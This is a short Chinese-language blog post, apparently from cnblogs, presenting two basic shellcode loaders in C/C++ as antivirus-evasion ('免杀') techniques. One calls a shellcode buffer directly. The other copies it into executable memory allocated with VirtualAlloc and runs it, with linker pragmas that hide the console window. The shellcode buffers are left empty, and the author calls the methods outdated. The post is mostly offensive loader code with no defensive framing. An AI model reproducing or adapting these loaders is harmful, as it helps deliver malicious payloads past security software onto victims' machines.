通过使用直接加载的方式来加载shellcode,是最初始的免杀手段。
不过随着对抗的加剧,该方法现在已经不再实用。
#include <stdio.h>
#include <stdlib.h>
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
unsigned char buf[] = "";
void main() {
printf("START");
((void(*)(void)) & buf)();
printf("END");
system("pause");
}
也可以动态申请内存,也是初始的免杀手法。
不过随着对抗的加剧,该方法现在已经不再实用。
#include <iostream>
#include <windows.h>
using namespace std;
//data段可读写
#pragma comment(linker, "/section:.data,RWE")
//隐藏窗口
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
#pragma comment(linker, "/INCREMENTAL:NO")
/* length: 800 bytes */
unsigned char buf[] = "";
int main() {
void* exec = VirtualAlloc(0, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, buf, sizeof(buf));
((void(*)())exec)();
system("pause");
return 0;
}标签:comment,include,免杀,void,linker,pragma,直接,buf,加载 From: https://www.cnblogs.com/wuruixin/p/17016610.html